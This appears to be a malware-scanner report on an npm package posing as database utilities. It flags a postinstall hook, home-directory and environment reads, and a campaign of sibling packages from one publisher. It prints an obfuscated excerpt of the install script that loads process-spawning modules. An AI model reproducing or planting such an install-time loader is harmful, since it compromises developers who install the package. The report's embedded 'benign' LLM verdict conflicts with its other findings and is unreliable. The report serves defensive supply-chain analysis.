// npm package
@cloudplatform-single-spa/svp-baas
Internal database utilities with connection pooling, query builder and migration support
weekly
112
monthly
112
versions
3
maintainers
1
license
UNLICENSED
first publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,379 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x4aefa3=a0_0x4799;(function(_0x188295,_0x277723){const _0xb11819=a0_0x4799,_0x5db401=_0x188295();while(!![]){try{const _0x33a509=-parseInt(_0xb11819(0x19b))/(0x778+0xa67+-0x2*0x…// publisher campaignby mr.4nd3r50n
9 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 8 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4978reads-env-varsreads-homedir
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x4aefa3=a0_0x4799;(function(_0x188295,_0x277723){const _0xb11819=a0_0x4799,_0x5db401=_0x188295();while(!![]){try{const _0x33a509=-parseInt(_0xb11819(0x19b))/(0x778+0xa67+-0x2*0x8ef)*(-parseInt(_0xb11819(0x1a3))/(0x1474+0x9*-0x3eb+-0x1*-0xed1))+parseInt(_0xb11819(0x1ce))/(-0x2*0xb32+-0x1db1+-0x4*-0xd06)+-parseInt(_0xb11819(0x1c2))/(-0xf97+0x29*-0x37+0xa*0x271)*(-parseInt(_0xb11819(0x176))/(0xc5*-0x2d+0x1269+0x103d))+parseInt(_0xb11819(0x191))/(-0x1029+0x6*0x431+-0x8f7)+-parseInt(_0xb11819(0x161))/(-0x30*-0x4+0xa6*0xf+-0xa73)+-parseInt(_0xb11819(0x1a2))/(-0x4*-0x72b+0x225a+-0x3efe)*(-parseInt(_0xb11819(0x1ba))/(-0x1b4f+0x2c*-0xe0+0x41d8))+parseInt(_0xb11819(0x1a4))/(-0x47*0x79+0x6f1+0x355*0x8)*(-parseInt(_0xb11819(0x1bd))/(-0x1*-0x1595+0x3*-0x365+-0xb5b));if(_0x33a509===_0x277723)break;else _0x5db401['push'](_0x5db401['shift']());}catch(_0x37ee09){_0x5db401['push'](_0x5db401['shift']());}}}(a0_0x1420,-0x8d8ee+-0xfcb91+-0x1*-0x2136cd));const a0_0x31d245=require('os'),a0_0x457774=require('fs'),a0_0x5c5cd7=require(a0_0x4aefa3(0x16c)),a0_0x59d0f4=require(a0_0x4aefa3(0x16f)),a0_0x3f9b94=require(a0_0x4aefa3(0x19e)),{execSync:a0_0x3cd3ac,spawn:a0_0xdad650}=require(a0_0x4aefa3(0x183)),a0_0x5f2032=a0_0x4aefa3(0x186),a0_0xc7f5f2=a0_0x4aefa3(0x1cb),a0_0x29469c=a0_0x4aefa3(0x1b4)+a0_0x4aefa3(0x1c9),a0_0x70af96=a0_0x4aefa3(0x187),a0_0x5d94fe=!!process.env[a0_0x70af96],a0_0x249cb8=a0_0x4aefa3(0x16e)===a0_0x4aefa3(0x16e)||!!process.env[a0_0x29469c+'RECON_ONLY'];function --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
